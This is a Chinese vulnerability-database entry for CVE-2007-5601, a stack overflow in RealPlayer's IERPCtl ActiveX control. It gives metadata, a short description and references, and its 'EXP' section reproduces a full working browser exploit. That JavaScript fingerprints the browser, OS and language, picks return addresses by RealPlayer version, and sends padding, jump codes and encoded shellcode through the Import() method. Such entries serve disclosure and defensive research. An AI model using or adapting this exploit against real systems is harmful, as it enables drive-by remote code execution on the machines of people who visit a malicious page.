RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113811 漏洞类型 缓冲区溢出
发布时间 2007-10-18 更新时间 2008-11-07
CVE编号 CVE-2007-5601 CNNVD-ID CNNVD-200710-414
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30692
https://www.securityfocus.com/bid/26130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-414
|漏洞详情
RealPlayer是一款流行的媒体播放器,支持多种媒体格式。RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。由于可使用ierpplug.dll所提供的IERPCtlActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并通过IERPCtlActiveX控件的Import()方式导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/26130/info

RealPlayer is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks of user-supplied input before copying it to an insufficiently sized memory buffer.

Attackers can exploit this issue to execute arbitrary code in the context of the application using the affected control (typically Internet Explorer). Successful attacks can compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. 

<script language="javascript">

eval("function RealExploit()

{

var user = navigator.userAgent.toLowerCase();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

  return;

if(user.indexOf("nt 5.")==-1)

  return;

VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

  Real = new ActiveXObject(VulObject);

}catch(error)

{

  return;

}

RealVersion = Real.PlayerProperty("PRODUCTVERSION");

Padding = "";

JmpOver = unescape("%75%06%74%04");

for(i=0;i<32*148;i++)

  Padding += "S";

 

 

if(RealVersion.indexOf("6.0.14.") == -1)

{

  if(navigator.userLanguage.toLowerCase() == "zh-cn")

   ret = unescape("%7f%a5%60");

  else if(navigator.userLanguage.toLowerCase() == "en-us")

   ret = unescape("%4f%71%a4%60");

  else

   return;

}

else if(RealVersion == "6.0.14.544")

  ret = unescape("%63%11%08%60");

else if(RealVersion == "6.0.14.550")

  ret = unescape("%63%11%04%60");

else if(RealVersion == "6.0.14.552")

  ret = unescape("%79%31%01%60");

else if(RealVersion == "6.0.14.543")

  ret = unescape("%79%31%09%60");

else if(RealVersion == "6.0.14.536")

  ret = unescape("%51%11%70%63");

else

  return;

 

 

 

if(RealVersion.indexOf("6.0.10.") != -1)

{

  for(i=0;i<4;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.11.") != -1)

{

  for(i=0;i<6;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.12.") != -1)

{

  for(i=0;i<9;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.14.") != -1)

{

  for(i=0;i<10;i++)

   Padding = Padding + JmpOver;

   Padding = Padding + ret;

}

 

AdjESP = "LLLL\\XXXXXLD";

Shell = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";

PayLoad = Padding + AdjESP + Shell;

while(PayLoad.length < 0x8000)

  PayLoad += "YuanGe"; // ?~??~-.=!

Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);

}

RealExploit();")

</script>
|受影响的产品
RealNetworks RealPlayer 10.5 RealNetworks RealPlayer 10.0 + S.u.S.E. cvsup-16.1h-43.i586.rpm + S.u.S.E. Linux Personal 9.3
|参考资料

来源:US-CERT
名称:TA07-297A
链接:http://www.us-cert.gov/cas/techalerts/TA07-297A.html
来源:US-CERT
名称:VU#871673
链接:http://www.kb.cert.org/vuls/id/871673
来源:XF
名称:realplayer-activex-bo(37280)
链接:http://xforce.iss.net/xforce/xfdb/37280
来源:MISC
链接:http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.html
来源:SECTRACK
名称:1018843
链接:http://www.securitytracker.com/id?1018843
来源:BID
名称:26130
链接:http://www.securityfocus.com/bid/26130
来源:MISC
链接:http://www.infosecblog.org/2007/10/nasa-bans-ie.html
来源:VUPEN
名称:ADV-2007-3548
链接:http://www.frsirt.com/english/advisories/2007/3548
来源:service.real.com
链接:http://service.real.com/realplayer/security/191007_player/en/
来源:SECUNIA
名称:27248
链接:http://secunia.com/advisories/27248